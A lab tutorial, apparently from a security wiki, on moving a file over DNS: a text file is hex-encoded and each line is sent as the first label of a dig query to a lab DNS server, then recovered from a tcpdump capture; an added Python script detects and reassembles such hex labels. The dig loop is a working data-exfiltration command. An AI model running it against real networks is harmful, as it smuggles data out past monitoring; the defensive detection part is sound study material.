Original: http://www.aldeid.com/wiki/File-transfer-via-DNS
Test environment:
- Client: 192.168.106.134
- Server: 192.168.106.131, running a bind9 DNS server
Demo:
Encoding:
On the client, prepare a plain-text file:
client$ cat > loremipsum.txt << EOF
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
EOF
Then hex-encode it:
client$ xxd -p loremipsum.txt > loremipsum.hex
Transferring the file:
On the server, start a tcpdump capture:
server$ sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.106.134'
On the client, send each line of the hex file as the first label of a fake DNS query:
client$ for b in `cat loremipsum.hex`; do dig @192.168.106.131 $b.fakednsrequest.com; done
Once all requests have been sent, stop the capture. The requests look like this (each query appears three times because dig retransmits when it gets no answer):
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest
reading from file loremipsum.pcap, link-type EN10MB (Ethernet)
16:27:53.643447 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:27:58.644248 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:03.645370 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:08.660632 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:13.663396 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:18.664434 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:23.677182 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:28.677606 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:33.678711 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:38.689582 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:43.689821 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:48.691096 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:53.702963 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:28:58.703995 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:03.705035 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:08.723883 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:13.724759 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:18.725429 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:23.736561 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:28.737793 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:33.738747 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:38.793934 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:43.794793 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:48.795804 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:53.839608 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:29:58.820917 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:03.821932 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:08.865585 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:13.867062 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:18.868091 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:23.914226 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:28.914082 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:33.916140 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:38.967663 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:43.969259 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:48.960339 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:54.018795 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:30:59.019316 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:04.010034 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:09.067424 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:14.068462 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:19.069481 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:24.140100 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:29.141466 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:34.142622 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
Decoding the file:
Use a chain of cut commands to extract the hex file (field 8 is the query name, its first label is the hex chunk, and uniq drops the retransmitted duplicates):
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest | cut -d ' ' -f 8 | cut -d '.' -f 1 | uniq > loremipsum.hex
Now decode the file:
$ xxd -r -p < loremipsum.hex
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
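As an added example (not part of the original page), a Python version of the decode step that a defender could run over tcpdump output in the format shown above: it parses the query lines, flags first labels that look like hex-encoded payload (long, even length, hex digits only), dedupes dig's retransmissions by client socket and DNS ID instead of relying on uniq, and reassembles the bytes. The sample lines are constructed in the same format as the capture above.

```python
import re
from collections import OrderedDict

# Constructed sample in tcpdump -n format: one query repeated (a dig
# retransmission shares the source port and DNS ID), one more chunk, and
# one ordinary lookup that must not be flagged.
SAMPLE = """\
16:27:53.643447 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d.fakednsrequest.com. (97)
16:27:58.644248 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d.fakednsrequest.com. (97)
16:28:08.660632 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 20646f6c6f722073697420616d65740a.fakednsrequest.com. (91)
16:28:10.000000 IP 192.168.106.134.55095 > 192.168.106.131.53: 46494+ A? www.example.com. (33)
"""

# timestamp IP src > dst: id+ TYPE? name. (len)
LINE_RE = re.compile(r"^(\S+) IP (\S+) > (\S+): (\d+)\+ (\w+)\? (\S+)\. \(\d+\)$")
HEX_LABEL_RE = re.compile(r"^[0-9a-f]+$")


def parse_queries(text):
    """Return (src, dns_id, qtype, qname) for every tcpdump query line."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            _ts, src, _dst, dns_id, qtype, qname = m.groups()
            out.append((src, int(dns_id), qtype, qname))
    return out


def suspicious_labels(queries, min_len=20):
    """Detection heuristic: first label is long, even-length and pure hex."""
    hits = []
    for src, dns_id, _qtype, qname in queries:
        label = qname.split(".")[0]
        if len(label) >= min_len and len(label) % 2 == 0 and HEX_LABEL_RE.match(label):
            hits.append((src, dns_id, label))
    return hits


def reassemble(hits):
    """Dedupe retransmissions (same client socket + DNS ID), decode in order."""
    seen = OrderedDict()
    for src, dns_id, label in hits:
        seen.setdefault((src, dns_id), label)
    return b"".join(bytes.fromhex(label) for label in seen.values())


if __name__ == "__main__":
    print(reassemble(suspicious_labels(parse_queries(SAMPLE))).decode())
```

The same heuristic, run over a real capture, is a cheap first-pass detector for hex-encoded data leaving over port 53; a tuned rule would also count queries per client and per parent domain.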
Limitations:
- The transferred data is twice the size of the source file (hex encoding doubles it)
- It is fairly visible, since the high rate of requests can raise suspicion
- Depending on the size of the source file, the transfer can take a long time
- Unless the file is encrypted before hex encoding, it is trivial to decode
- Large files may lose packets (UDP)